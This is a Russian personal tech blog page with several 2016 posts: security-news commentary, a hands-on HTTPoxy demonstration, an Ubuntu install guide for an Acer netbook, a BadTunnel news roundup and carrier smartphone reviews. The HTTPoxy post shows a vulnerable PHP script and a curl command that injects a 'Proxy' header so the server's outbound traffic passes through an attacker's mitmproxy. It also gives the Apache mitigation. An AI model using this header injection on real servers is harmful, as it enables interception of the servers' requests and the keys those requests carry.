пятница, 22 июля 2016 г.

Всё обо всём. Выпуск #02.

Ну и небольшой пост из цикла "все обо всем", который я пишу уже фактически под утро ;) Пост будет из серии о том "как страшно жить". Вы наверное заметили что последние несколько постов так или иначе касались сетевой безопасности, различных уязвимостей и т.п. Обычно, когда нам случайно попадаются какие-то новости по аналогичной тематике - вроде, в Android обнаружена очередная StageFright уязвимость, устройства Apple подвержены атаке через MMS, новый банковский троян похищает данные пользователей и т.п. - большинство воспринимает их как нечто реально существующее, но лично их не касающееся ... а зря.

Ну например, взять хотя бы мой последний пост о HTTPoxy, не знаю насколько он интересен большинству читателей, и насколько кто-то из них вообще попытался понять смысл этой уязвимости, но представим себе банальную ситуацию. Например, вы как пользователь каждый день пользуетесь каким-то web-сервисом, который хранит некоторую персональную информацию о вас. Web-сервис этот в свою очередь теоретически может быть подвержен этой (или другой) уязвимости, благодаря которой данная информация без проблем уйдет потенциальным злоумышленникам. Вы скажете - хм ... ну уйдет и уйдет, у меня ничего секретного нет. Ну это как сказать ... а потом люди удивляются звонкам в банк якобы от их имени, заявкам на обновление данных и пропаже денег со счета. Показательная статья на тему - Как угоняют банковские карты продавцов на Avito, Auto.ru и других классифайдах. Паспортные данные, ФИО, имя собаки, первого учителя или девичья фамилия матери - все это, на мой взгляд, информация, которую "всем подряд" о вас знать не обязательно. Тем не менее какую-то часть этой информации мы добровольно оставляем в интернете, регистрируясь на различных сервисах и т.п.

При этом можно даже пользоваться "проверенными сервисами", например, читать почту только в Веб-интерфейсе Яндекса, а баланс сотового телефона проверять с помощью USSD запроса или в личном кабинете на сайте оператора. При этом у вас может быть ложное чувство защищенности ... На самом деле оно ложное ;) Вот еще одна показательная статья - Добавляем произвольный телефон в личном кабинете оператора мобильной связи Киевстар (Украина). Автор описывает уже закрытую уязвимость в ЛК оператора сотовой связи, которая позволяла прицепить в свой ЛК любой номер телефона, т.е. практически обойти двухфакторную авторизацию, которая использовалась в процессе. Рассказывать какие перспективы подобная уязвимость открыла бы злоумышленникам - думаю не нужно. Полное управление услугами, включая установку переадресации, контроль над SMS и т.п. и т.п. При этом скорее всего, если бы в результате эксплуатации подобного бага в web-сервисе с вашим личным номером что-либо произошло (например, пропали деньги со счета или еще что-то подобное) докопаться до-сути лично вам, как абоненту, было бы малореально. Представили? Хорошо, идем дальше.

Еще несколько новостей ... у вас есть антивирус? Вы чувствуете себя защищенным? Несмотря на то что избитую фразу о том что не один антивирус не дает 100%-ой гарантии защиты наверняка вы тоже слышали и неоднократно, вы все же продолжаете удивляться когда "хватаете" какого-то вредоноса из интернета ... как, ведь у меня был антивирус ... и это только один аспект. Ведь никто никогда не задумывается что по-сути сами антивирусные продукты могут также содержать уязвимости, которые только облегчают проникновение вредоносного ПО в систему. Да, да, именно так ... антивирус, для облегчения заражения ПК вирусами ;) Вы же принимали лицензионное соглашение при установке, о том что разработчик не несет никакой, ни прямой, ни косвенной ответственности, за ущерб и любые другие неприятности, произошедшие с вашим ПК после установки его программного продукта ... читали ... или делали вид что читали ... но раз у вас есть антивирус - наверняка вы приняли его ;) Ну так вот очередная страшилка на тему - Уязвимости в 15 антивирусах позволяют внедрить вредоносный код в любой процесс на системе. О чем это говорит? ;) Только о том что антивирус это такое же программное обеспечение как и стандартный виндовый "Блокнот" или пасьянс "Косынка", только в отличие от них его компоненты выполняются с более высокими привилегиями в системе ... и тоже написаны людьми, поэтому потенциально могут содержать ошибки. Здесь же можно было рассказать о последних уязвимостях в продуктах Symantec, но это уже успели сделать многие другие ресурсы ...

Теперь перейдем к проверенным и хорошо зарекомендовавшим себя ресурсам и сервисам. Если вам немного знакома роль системного админстратора или хотя бы раз приходилось помогать знакомым с ПК удаленно, то наверняка вы слышали о таком ПО как TeamViewer или Ammyy Admin. Месяц назад, если я ничего не путаю в хронологии, новости околоITшных ресурсов пестрили заголовками о том, что якобы сервера TeamViewer были скомпрометированы, а часть пользовательских данных утекла в сеть. Собственно я всегда говорил о том, что при использовании ПО для удаленного администрирования не в стиле p2p, т.е. клиент-сервер, а в схеме Удаленный ПК <-> Сервер 3-их лиц <-> Оператор всегда есть определенные риски, что это самое "промежуточное звено" может подвергнуться атаке. Что и случилось в данном случае. Теперь то же самое по всей видимости постигло и Ammyy Admin ... только чуть по-другому - Банковский троян Lurk распространялся через сайт Ammyy Admin. Чувствуете в чем соль ситуации? Вы заходите на "проверенный сайт" или советуете коллегам, родственникам, друзьям установить Ammyy Admin с оф. сайта программы, они заходят, скачивают, запускают (при этом возможно даже игнорируют предупреждения антивирусной системы, т.к. понятно что он будет "ругаться" на ПО для удаленного администрирования) и получают к себе на ПК Lurk. Действительно, опасность там, где ее не ждешь.

И подобных "страшилок" можно привести не мало ... на самом деле достаточно просто поинтересоваться и задать соответствующий вопрос поисковикам. Windows 10 собирает информацию о пользователях? Ладно, не новость ... правительство Франции обязало корпорацию Microsoft "унять активность" новой операционной системы по сбору данных? Тоже слышали ... законы, законами, а вот что будет в реальности и как это будет реализовано известно только Microsoft'у (как, вы еще не обновились бесплатно до Windows 10? ;) ... А как вам новости про Intel ME и "закладки" в чипах Intel? Для тех кто еще не читал, несколько ссылок для размышлений:


И все это только "верхушка айсберга" ;) Про охватившую мир "покемономанию" и т.п., пожалуй уже не буду, хотя на самом деле есть что сказать. Собственно появления подобного рода развлечений было вполне ожидаемо, тем более что GPS модуль сейчас имеется даже в самом дешевом гаджете. Скоро, как я подозреваю, подобные развлечения выйдут на новый уровень ... и охотиться мы будем не за виртуальными желтыми и ярко-зелеными "нечто", а, например, за объектами оставленными в дополненной реальности другими пользователями. А что ... этакий Counter Strike или казаки-разбойники в дополненной реальности ;))

На этом я пожалуй закончу сей опус и спасибо что дочитали до конца ;)

HTTPoxy уязвимость. Перенаправление запросов web-приложений.

18 июля 2016 года была опубликована информация о так называемой уязвимости HTTPoxy, которая позволяет атакующему с помощью подмены заголовков HTTP запроса при существовании определенных условий перенаправить запрос web-сервера через свой Proxy-сервер. Подробнее информация об этой уязвимости описана тут - Уязвимость HTTPoxy позволяет перенаправлять http-запросы веб-приложений и в первоисточнике на https://httpoxy.org/ . Давайте попробуем рассмотреть более подробно, что из себя представляет данная уязвимость и попытаемся использовать ее в тестовом окружении.

Предположим что web-приложение выполняющееся на стороне сервера так или иначе использует переменные окружения для настройки исходящих соединений. Например у нас есть такой скрипт (примерно аналогичная уязвимость была обнаружена и исправлена в artax, об уязвимости которого говорилось в бюллетене):

<?php

function autoDetectProxySettings() {
if (($httpProxy = getenv('http_proxy')) || ($httpProxy = getenv('HTTP_PROXY'))) {
             return $httpProxy;
         }
}

$httpProxy = autoDetectProxySettings();

$ch = curl_init("http://www.decker.su");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if (isset($httpProxy)) { curl_setopt($ch, CURLOPT_PROXY, $httpProxy); }
$result = curl_exec($ch);

echo $result;

?>

На первый взгляд скрипт не содержит уязвимостей, он получает "дефолтные" настройки http_proxy из переменных окружения, осуществляет запрос на URL www.decker.su (здесь, представьте, что этот скрипт к примеру, мог обращаться к какому-либо Web API и передавать в запросе секретны ключи и т.п. информацию) и выводит полученный ответ на экран.

Запустив скрипт, набрав в браузере http://server.url/test.php мы получим в качестве результата заглавную страницу decker.su. Теперь давайте попробуем представить себя на стороне атакующего. Поднимем на каком-нибудь хосте в интернете Mitmproxy (чуть подробнее про него можно почитать тут - Анализ HTTP-трафика с Mitmproxy) и попробуем вставить в заголовки GET-запроса к нашему скрипту с помощью Burp SuiteTamper Data или curl заголовок Proxy. Я воспользуюсь последним способом и просто запущу curl:

curl -H "Proxy: proxy:port" http://server.url/test.php 

Здесь proxy:port - адрес и порт нашего mitmproxy, http://server.url/test.php - URL уязвимого web-приложения. И тут же в логах mitmproxy мы увидим следующую строку:


Таким образом, всего-лишь добавив одну строку заголовка Proxy: proxy:port в GET-запрос, нам удалось перенаправить исходящий трафик web-сервера через свой Proxy.

Что же получилось? Сервер получив заголовок Proxy в запросе преобразовал его в переменную окружения $_SERVER[«HTTP_PROXY»], которая и была успешно считана скриптом с помощью getenv('HTTP_PROXY'). Как отметил Evengard на Хабре:

"А, всё, почитал источник и разобрался в чём суть уязвимости. Дело не в том, что именно Proxy превращается в HTTP_PROXY, а вообще любые заголовки превращаются в переменные окружения с префиксом «HTTP_»."

В этом несложно убедиться подставив в заголовок запроса еще несколько параметров, ну например: curl -H "Proxy: proxy:port" -H "Blogger: Decker" -H "Year: 2016" http://server.url/test.php, а потом считав содержимое переменной $_SERVER в скрипте:

  'HTTP_ACCEPT' => '*/*',
  'HTTP_HOST' => 'server.url',
  'HTTP_USER_AGENT' => 'curl/7.37.1',
  'HTTP_PROXY' => 'proxy:port',
  'HTTP_BLOGGER' => 'Decker',
  'HTTP_YEAR' => '2016',

Описанная уязвимость затрагивает только те web-приложения, которые явно или неявно используют переменные окружения в своей работе. Т.к. любой пользователь интернет сформировав заголовок Proxy в HTTP запросе может изменить переменную окружения HTTP_PROXY на сервере, естественно, что доверять такой переменной нельзя, т.к. пользователь может подставить в нее что угодно и, как следствие, получить контроль над исходящим трафиком web-приложения.

Давайте проверим, что произойдет если PHP на нашем web-сервере будет настроен как модуль Apache (php5_module, т.е. вариант PHP_SAPI = "apache"), а сервер будет осуществлять исходящие запросы с помощью простейшей file_get_contents. Т.е. скрипт на сервере будет представлять нечто вроде:
echo file_get_contents("http://decker.su");
Как вы думаете? А ничего не произойдет. Т.к. file_get_contents при текущих настройках сервера никак не зависит от переменных окружения. Т.е. несмотря на то что HTTP_PROXY при исполнении скрипта у нас все равно установилась в proxy:port, который подставил атакующий - запрос был отправлен напрямую. Таким образом уязвим ваш веб-сервер перед данной атакой или нет целиком и полностью зависит от используемого HTTP client'а, т.е. использует ли веб-приложение переменные окружения для определения параметров proxy или нет. В случае со скриптом #1, как мы убедились - использует, в случае со скриптом #2 - не использует.

В любом случае лучше защитить ваш web-сервер согласно рекомендациям приведенным здесь и вырезать HTTP заголовок Proxy еще при поступлении запроса. Для Apache, например, это можно сделать с помощью mod_headers и директивы RequestHeader unset Proxy.

Полезные ссылки

среда, 20 июля 2016 г.

Установка Ubuntu на Acer Aspire ES 11 (ES1-131-C1NL)

В этом посте я хотел бы вкратце рассказать вам о том, как установить Ubuntu 14.04.4 Desktop на нетбук Acer Aspire ES 11 (ES1-131-C1NL). Особенность этой модели в том, что вместо стандартного SATA HDD или SSD в нем используется 32 Gb eMMC Flash (в технических характеристиках в большинстве интернет-магазинов при этом просто указано, SSD 32 Gb, без малейшего намека на то что это не стандартный SATA SSD, а именно встроенная eMMC Flash), поэтому после установки при попытке первого запуска системы, после меню GRUB'а вы с вероятность в 90% увидите либо черный экран, либо же, надпись No Boot Device при загрузке еще до GRUB'а. На самом же деле все просто ... до установки Ubuntu включаем режим UEFI в BIOS и берем 64-битный дистрибутив ОС, в моем случае это был ubuntu-14.04.4-desktop-amd64.iso, скачанный с mirror.yandex.ru. Далее загружаемся с внешнего DVD, USB Flash и т.п. и производим установку операционной системы как обычно. По завершению установки при перезагрузке ПК сразу же нажимаем периодически F2 для того чтобы зайти в BIOS и выполняем следующие действия:

  • На закладке Security с в меню Set Supervisor Password устанавливаете пароль администратора, для входа в BIOS.
  • Далее, выбираете опцию Select an UEFI file as trusted for executing и нажимаем Enter.
  • Далее перемещаемся последовательно в меню: EMMC -> EFI -> <ubuntu> и выбираем файл shimx64.efi, нажимаем на нем Enter после чего система выдаст диалоговое окно, в котором попросит вас задать описание пункта загрузки в базу данных. Набираем там что угодно, к примеру, shimx64ubuntu.
  • Если вы все сделали правильно, то в меню Boot -> Boot priority order у вас появится опция EI File Boot 0: shimx64ubuntu.
  • Выбираем Exit -> Exit saving changes и наслаждаемся загрузкой Ubuntu, которая длится всего несколько секунд.

p.s. Ну и небольшое лирическое отступление. Многие спросят, а зачем, собственно, все это нужно? Так получилось, что мне понадобился достаточно шустрый девайс с клавиатурой (!) для web-серфинга и ответов на email в дороге, т.е. попросту мобильное устройство в котором будет браузер, почтовый клиент и клавиатура. Основным требованием была компактность устройства, легкость, и безукоризненное выполнение перечисленных функций. Т.е. по-сути, он должен быстро загружаться после холодного старта, быстро выходить из режима "гибернации", а также "не тормозить" в браузере при просмотре страниц. При этом бюджет на подобный гаджет был определен достаточно небольшой, что-то в районе 10-15k руб., что сразу отметало "фантастические" покупки вроде Apple Mac Book Air или какого-нибудь аналогичного девайса с ОС Windows на Core i5-i7 ;) Пересмотрев несколько вариантов бюджетных планшетов с "док-станцией" и клавиатурой (Irbis, DEXP и т.п.) - я пришел к выводу что все это достаточно неудобно, и при длительном использовании есть небольшой риск повредить соединительный разъем планшета с клавиатурой. Плюс, надо сказать, что просто планшет и отдельная Bluetooth-клавиатура к нему у меня конечно же есть (вот здесь я кстати описывал как подключить BT-клавиатуру к девайсу на Android и настроить переключение раскладки) и судя по опыту - два девайса (клавиатура + планшет), это не так удобно. Т.е. хотелось монолитности. Поэтому я решил взглянуть в сторону бюджетных ультрабуков. Acer Aspire ES1-131-C1NL как раз был одним из них (еще были различные варианты от DEXP'а, но они сразу отошли на второй план в силу уродливости дизайна) ... 

Не такой уж мощный девайс, Intel Celeron N3050 на борту, Intel HD Graphics, 2 GB DDR3 L Memory и eMMC 32 Gb. Естественно, предустановленная Windows 10. Единственным фактором который меня радовал и смущал одновременно - это eMMC 32 Gb. Т.е. в данной модели нет SATA SSD или HDD, вместо этого в нем установлена eMMC Flash на 32 Gb (как в телефонах, планшетах и т.п. гаджетах), которая физически, как я понимаю, просто представляет собой отдельный чип на материнской плате устройства и не подлежит замене. Так вот плюс конечно в том что это все же "SSD", т.е. по идее девайс в плане обращения к накопителю должен быть производительным, ну или по-крайней мере превосходить (не уступать) аналогичным моделям с HDD, ну а минус - это его объем и невозможность замены. Так или иначе я решился на эту покупку (т.к. пользуюсь им всего несколько часов, пока ничего хорошего или плохого рассказать не могу) ... при этом загрузившись в штатный Windows 10 я решил сразу же поменять его на что-то более интересное. Причин тому несколько, я ничего не имею принципиально против Windows 10, даже несмотря на всю эту шумиху с телеметрией, отправкой неких пользовательских данных, огромном (почти 5 Gb'ным) обменом трафиком с серверами Microsoft после первого включения и т.п. ... но сразу же после запуска Google Chrome на Win10 и этом нетбуке мне показалось что он "подтормаживает". При этом в диспетчере задач Windows сам диспетчер задач загружал систему на 14-20% )) Не говоря уже о работающих приложениях ... поэтому в качестве альтернативы я сразу же решил попробовать Ubuntu, заоодно, приобщившись к чудесному миру Open Source ;))) О результатах этого приобщения я возможно расскажу чуть позже, ну а пока, просто, хотелось бы отметить, что чисто визуально тот же Chrome на нем работает чуть быстрее, чем на Win10:


Да и загрузка CPU не такая большая. Вообщем поживем, как говорится, увидим ... Опять же я не сторонник различных holy wars на тему Windows vs. Linux, но тот факт, что благодаря Ubuntu различные Windows-ориентированные вредоносы обойдут меня стороной - не может не радовать. Плюс, опять же, все это довольно шустро грузится и работает, по-крайней мере пока ... ;) 

воскресенье, 17 июля 2016 г.

MTC SMART Surf 2 4G. Предварительный анонс.

В феврале этого года я рассказывал вам об очередном брендированном смартфоне от МТС - МТС Smart Surf 4G (с обзором аппарата, а также дополнительной информацией можно ознакомиться на страницах этого сайта), и вот, сегодня стало известно о том, что оператор планирует выпустить "вторую версию" этого смартфона с названием МТС Smart Surf 2 4G. В отличие, например, от Мегафон модельный ряд брендированных устройств которого практически не обновлялся в течении 2016 года, МТС продолжает продвигать свои фирменные устройства на рынок. Что же можно сказать о МТС Smart Surf 2 4G уже сейчас? В первую очередь то, что он будет построен уже на более современной версии Android - Android 6.0 (MRA58K) Marshmallow. Чипсет, по-сравнению с первой версией, также претерпел незначительные изменения, так - МТС Smart Surf 2 4G построен на базе Mediatek MT6737M. Новый чипсет также обладает 4 ядрами Cortex-A53 с максимальной тактовой частотой 1.1 GHz и графической подсистемой на базе Mali-T720MP1 550MHz. Производительность, по сравнению с MT6735M при этом осталась на прежнем уровне, однако, Mediatek заявляет для нового чипа более низкое энергопотребление, следствием которого является более устойчивая работа в мобильной сети, а также интегрированный модем LTE Cat.4. Более подробно о SoC MediaTek MT6737 вы можете прочитать здесь. Разрешение экрана МТС Smart Surf 2 4G - 720x1280 пикселей, о его размере на данный момент пока ничего неизвестно, также, в отличие от предыдущей версии, аппарат будет поддерживать всего одну SIM. Ожидаемый объем встроенной памяти - 4 Gb, при этом часть из этого объема будет занимать операционная система и служебные файлы, в то время как пользователю максимально будет доступно около ~1.5 Gb свободного места (чуть меньше, в зависимости от количества предустановленных приложений).

Представленные технические характеристики, естественно, являются ориентировочными и к моменту появления аппарата в продаже (дата старта продаж на данный момент также неизвестна) могут быть изменены. Следите за новостями.

Обновлено 03.11.2016 03:09 (MSK)

МТС Smart Surf2 4G. Краткий обзор нового Surf'а ... - для тех кому интересно, смартфон был замечен в продаже 1 ноября, цена - 4990 руб. 

понедельник, 11 июля 2016 г.

BadTunnel: Плохие новости? Новая критическая уязвимость во всех версиях Windows.

Если вы следите за новостями в мире IT, то наверное заметили что уже все успели опубликовать "сенсационную новость" о том что в ОС Windows была обнаружена новая критическая уязвимость, которая позволяет брать злоумышленнику под контроль весь трафик жертвы. Следующие статьи (на этот раз я решил привести их в виде списка) позволяют разобраться что к чему и так ли страшна новая уязвимость. Если вкратце, то в случае если ваша ОС уязвима, злоумышленник может вынудить ваш ПК открыть UDP-туннель через 137-й порт со своим сервером и с помощью поддельных ответов на запросы Web Proxy Auto-Discovery (WPAD) заставить ваш ПК применить специально подготовленные настройки Proxy-сервера в качестве системных, полностью получив контроль над трафиком вашей системы. Многие ресурсы, например ИА REGNUM, собственно так и описали худший из возможных сценариев: "Злоумышленник может контролировать не только HTTP и HTTPS-запросы: BadTunnel позволяет взять под контроль всю сетевую активность ОС. Например, вмешиваться в загрузку системных обновлений".

Теперь обещанные наиболее полезные ссылки, которые могут помочь разобраться в том, как же это происходит:


Ссылки на соответствующие KB на сайте Microsoft:


Однако, как выяснилось проблема и ее исправление имеет "побочные" эффекты. Так, например, после установки обновления KB3165191 (MS16-077) стало невозможным подключиться по протоколу Netbios over TCP/IP к сетевым шарам с клиентов, расположенных в других ip подсетях, а также появились проблемы при подключении Samba клиентов к контроллерам доменов расположенных в других подсетях. Более подробно про этом можно почитать на WinITPro.ru:


В итоге получаем что как уязвимость, так и само обновление направленное на ее исправление может принести немало головной боли системным администраторам, особенно тем, кому приходится иметь дело с достаточно крупной инфраструктурой.

пятница, 8 июля 2016 г.

МТС Smart Start 3. Третий представитель линейки смартфонов начального уровня.

В то время как на Mobile Review активно обсуждаются анонсы смартфонов с 8 Gb RAM на борту (да, да, вы не ослышались, подобные аппараты вскоре могут появиться на рынке, тем более что аппараты с 6 Gb RAM уже появились в продаже) сотовые операторы продолжают обновлять линейки "ультрабюджетных" смартфонов начального сегмента. Как правило, смартфоны из данной категории обладают минимальными характеристиками, невысокой производительностью, построены на базе бюджетного чипа и имеют небольшое количество оперативной и встроенной памяти, но и стоят в то же время в пределах 2000 руб. Именно по этим характеристиками их можно отнести к смартфонам "начального уровня". Т.е. это крайне бюджетное решение, которое обладает базовыми функциями - позвонить, выйти в интернет, посмотреть ролик на YouTube, поиграть в несложные игры. При этом "вычислительная мощность" устройства находится "на грани", т.е. едва успевая обеспечивать необходимый минимум производительности для выполнения всех этих задач. К примеру, открывая несколько приложений на таком устройстве - вы неизбежно столкнетесь с тормозами, сложные современные игры на нем не пойдут в принципе, а в некоторых случаях для их установки в памяти смартфона просто не хватит места, да и даже при простом перелистывании меню или фотографий в галерее вы с большой долей вероятности ощутите нехватку ресурсов.

Тем не менее такие устройства все еще продаются и, более того, являются востребованными потребителем. Отчасти из-за невысокой стоимости, отчасти из-за стереотипа "мне будет достаточно", "мне большего и не нужно", отчасти из-за отсутствия представлений о современных тенденциях на рынке мобильных гаджетов ... да по многим причинам. Так, например, при переходе со старенькой кнопочной "звонилки" на новый смартфон, на многих слова "две симки, цветной сенсорный экран, одна из последних версий ОС Android и четырёхъядерный процессор" действуют просто магически ...

Так или иначе подобные устройства имеют право на существование, являются востребованными, а спрос, как известно, рождает предложение. И третьим представителем линейки смартфонов "начального уровня" от МТС как раз и является МТС Smart Start 3.


Аппарат этот правда односимочный, но зато все остальное перечисленное выше для него справедливо. Так, МТС Smart Start 3 построен на базе чипа от Spreadtrum - SC7731 с 4 ядрами и тактовой частотой 1.3 Ghz. Оперативной памяти в новинке всего 512 Mb (для тех кто не воспринимает много это или мало - это 0.5 Gb, т.е. ощутимо мало по современным меркам), встроенной памяти - 4 Gb. Имейте ввиду что часть этого пространства занимает сама ОС Android 5.1 Lollipop с которой поставляется аппарат, поэтому пользователю не стоит рассчитывать более чем на 1 Gb свободного места для хранения своих данных (всего под раздел с данными пользователями зарезервировано 1.43 Gb места). Дисплей - 4" (TFT), с разрешением 480x800 пикселей. Основная камера у аппарата с разрешением - 2 MPix и даже есть 0.3 MPix "фронталка".


Что же касается сетевых возможностей, то тут у МТС Smart Start 3 необходимый минимум - аппарат работает в 2G (850, 900, 1800, 1900 MHz) и 3G (900, 2100 MHz) сетях, имеет модули WiFi и Bluetooth. Форм-фактор SIM-карты - microSD. Также, по-умолчанию аппарат работает только с SIM-картами оператора МТС, т.е. Simlock.

Ниже еще несколько фото самого аппарата:


Как видите в плане внешнего вида - все довольно стандартно. Корпус, выполненный в форме моноблока черного цвета. Кнопки управления громкостью и включения питания на правой кромке, разъем microUSB для зарядки и подключения к ПК, а также разъем для наушников на верхнем торце. На задней крышки камера и светодиод вспышки. Обратим внимание на оформление передней панели, а именно кнопки управления Android выполненные голубым цветом. Если кому-то из вас покажется что подобный дизайн элементов управления вы уже точно видели у какого-то производителя, то не ошибетесь, безошибочно узнав в нем ZTE. Кстати, "оригинальное название" МТС Smart Start 3 - это как раз ZTE Blade L110, в этом нетрудно убедиться запустив на смартфоне AIDA64 и обратив внимание на параметр "Устройство" в меню "Система".

Действительно, даже внешнее сходство заметно невооруженным глазом:


Разница разве что в логотипах ZTE и МТС на задней панели. К слову, на некоторых сайтах в технических характеристиках ZTE Blade L110 указывается 1 Gb RAM, но в версии МТС памяти именно 512 Mb. Надо заметить, что ZTE Blade L110 также поступил в продажу к оператору Velcom Беларусь и в Беларуси тоже 512 Mb'ная версия. Поэтому вопрос о том существует ли версия L110 с 1 Gb RAM или это просто ошибка в технических характеристиках в описании остается открытым.


В разных "реинкарнациях" ZTE Blade L110 получил свое распространение у разных операторов, ну а мы вернемся к нашей "модификации" - МТС Smart Start 3.


Как вы успели заметить у "оригинального" ZTE Blade L110 - два слота под SIM-карты, однако, у МТС Smart Start 3 слот всего один. Если разобрать аппарат, то можно убедиться что место под второй симхолдер в нем все-таки предусмотрено, но он просто не распаян (вот такой вот "удешевленный" вариант):


К слову о "дешевизне". На момент старта продаж цена аппарата составляет 2790 руб., что, конечно позволяет отнести его к категории бюджетных аппаратов начального уровня, однако, ставит в довольно невыгодное положение по сравнению с другими моделями (всего 512 Mb оперативной памяти, один слот, да и тот simlock), т.к. за ценник близкий к 3000 руб. можно приобрести куда более производительный аппарат.


Тем не менее давайте взглянем на интерфейс МТС Smart Start 3 и проведем несколько тестов производительности:



По интерфейсу все стандартно, лаунчер близкий к стоковому Android 5.1 Lollipop с постраничным отображением ярлыков, набор предустановленных операторских приложений, которые при желании можно удалить и тот самый 1 Gb пользовательского места о котором я говорил изначально.


В качестве "новшеств" можно отметить возможность переназначения левой и правой управляющих клавиш (стандартная фишка присущая аппаратам от ZTE), возможность удаления нескольких приложений за один раз, т.е. достаточно в меню Настройки выбрать пункт Удалить приложения и отметить галочками все что вам не нужно, а также возможность включения и отключения по таймеру, которую можно использовать для экономии заряда 1400 мА·ч батареи, установив например выключение аппарата на ночь и включение его с утра.

Информация из AIDA64:



Результаты тестирования в Antutu Benchmark и пример отображения страницы в штатном браузере:


Ну вот если вкратце, то и все что вам необходимо знать о МТС Smart Start 3. Выводы о том подойдет ли ему аппарат с подобными техническими характеристиками или нет - каждый сделает самостоятельно. Будем надеяться что со временем цена на этот аппарат у оператора упадет хотя бы до 1990 руб., за которые в свое время можно было приобрести первый Smart Start.

Обновлено 20.07.2016 11:58 MSK

С 20 июля, МТС, словно прислушавшись к тому что говорилось, что "неплохо было бы и снизить цену" запустил новую акцию, в рамках которой всю линейку смартфоном МТС Smart Start, т.е. МТС Smart Start 1/2/3, а также смартфон ARK S401 можно приобрести по специальной цене в 1490 руб. или 1890 руб. вместе с предоплаченным пакетом услуг. Узнать подробнее о проводимой акции можно на на официальном сайте оператора здесь, а ознакомиться с подробными условиями - тут.


Чтобы понимать порядок цифр за предоплаченный пакет услуг связи - два скриншота выше.

четверг, 7 июля 2016 г.

Tele2 Maxi. Предварительный анонс возможной новинки.

Не так давно стало известно об очередном возможном обновлении линейки брендированных устройств Tele2. Если вы внимательно следите за новостями, то в феврале этого года я рассказывал вам о Tele2 Mini - первом бюджетном 3G смартфоне компании с поддержкой нескольких SIM-карт. Спустя некоторое время после его выхода на форуме tele2life.ru один из абонентов предположил: "Если вышел Теле2 Mini, подозреваю, что на подходе ещё Теле2 Maxi  :) с памятью 2,5 Гига  :)", в принципе, он был недалек от истины. Оператор по всей видимости не остановился на выпуске одного гаджета и в скором времени, по неподтвержденной информации, представит нам очередную новинку с названием Tele2 Maxi. Что вообщем-то и логично в плане названий. На данный момент о новом смартфоне известно не так много.

Tele2 Maxi будет построен на четырехядерном (Cortex A7) чипе от Mediatek - MT6580. Чип выполнен по 28 нм. технологии, максимальная тактовая частота - 1.3 GHz. Графическое ядро чипа - Mali-400 MP2. Также в характеристиках чипсета указаны поддержка - камеры 8 Мп, видео 1080p, дисплея 720p, 802.11n Wi-Fi, BT 4.0, GPS, GLONASS, FM, HSPA, TDSCDMA. Обратите внимание, что это характеристики самого чипсета, что же касается количества камер, типе дисплея и т.п., которые будут реально установлены производителем в аппарат достоверной информации пока нет.

Известно лишь что экран у Tele2 Maxi будет с разрешением 720x1280 точек (?), т.е. HD, установленная ОС - Android 6.0 Marshmallow (MRA58K), а количество слотов под SIM-карты - 2. Размер eMMC Flash установленной в аппарате - 4 Gb, часть из этого места отводится под ОС, при этом пользователю остается (максимально) около 1.6 Gb для хранения пользовательских данных.

Таким образом мы получаем некий "аналог" уже известного нам Мегафон Login+, но от Теле2. По производительности и уже представленным техническим характеристикам аппараты примерно похожи (поддержки 4G/LTE в Tele2 Maxi как вы уже поняли - нет, т.к. MT6580 поддерживает только 3G), фактически MT6580 отличается от MT6582 используемом в Мегафон Login+ только наличием встроенного модема.

В результате на выходе мы возможно получим еще один неплохой операторский бюджетник с большим экраном и современной ОС. Суждено ли ему будет завоевать такую же популярность как "фаблет" конкурентов и появится ли Tele2 Maxi на прилавках - покажет время.

p.s. Кстати, вряд-ли кто-то интересуется рынком тайского телекома, но сравнительного недавно у одного из мобильных операторов Тайланда i-Mobile вышла похожая модель - i-Mobile i-Style 712. Здесь мы тоже имеем дело с двухсимочником на MT6580 и Android 6.0, правда вот размер экрана 4.5" и 480x854 пикселей.


Обновлено 09.07.2016 16:18 (MSK)

Кстати, буквально вчера в деловой электронной газете Татарстана «БИЗНЕС Online» было опубликовано интервью с генеральным директором Tele2 Сергеем Эмдиным в котором на вопрос о собственном железе: Нет ли желания уйти в «железо», создавать какие-то собственные девайсы? Он ответил следующее:

"У нас уже есть свой первый брендированный смартфон Tele2 Mini, скоро появятся Tele2 Midi и Maxi. Все это в процессе. Разумеется, мы не планируем сами что-то производить — это не наш профиль. Но мы имеем возможность в рамках тендерных процедур договариваться с крупнейшими производителями телефонов именно о том, что нам нужно. И они это производят под наш заказ."

Так что по всей видимости, кроме уже вышедшего Tele2 Mini и готовящегося к выходу Tele2 Maxi нас ожидает еще и нечто среднее между ними с названием Tele2 Midi. Другой информации про этот аппарат на данный момент пока нет.

Обновлено 27.09.2016 13:09 (MSK)

На сайте Tele2Life появилась информация о том, что Tele2 Maxi скоро поступит в продажу. До "официальной премьеры" смартфона ни его цена, ни технические характеристики не разглашаются, однако, как заявляет Tele2Life новинка станет самым большим и самым производительным смартфоном в линейке аппаратов Tele2. Учитывая то, что два предыдущие аппарата из линейки (Tele2 Mini и Tele2 Midi) обладали всего 512 Mb оперативной памяти (RAM), утверждение скорее всего недалеко от истины, т.к. было бы большой ошибкой со стороны маркетологов дать название Maxi аппарату с объемом RAM < 1 Gb. К слову об "инсайдерских слухах", пока все обсуждают дату возможного появления Tele2 Maxi в продаже, 4 сентября появилась непроверенная информация об еще одном возможном продолжателе линейки операторских аппаратов - Tele2 Midi 2. Теперь осталось только дождаться подтверждения этих слухов и сказать что-то вроде "А я же вам говорил ... " ;)

Обновлено 03.12.2016 18:14 (MSK)

Стали доступны первые отзывы о появлении новинки в салонах связи Tele2 в некоторых регионах. Подробности в посте - Tele2 Maxi. Обзор операторской новинки от Tele2.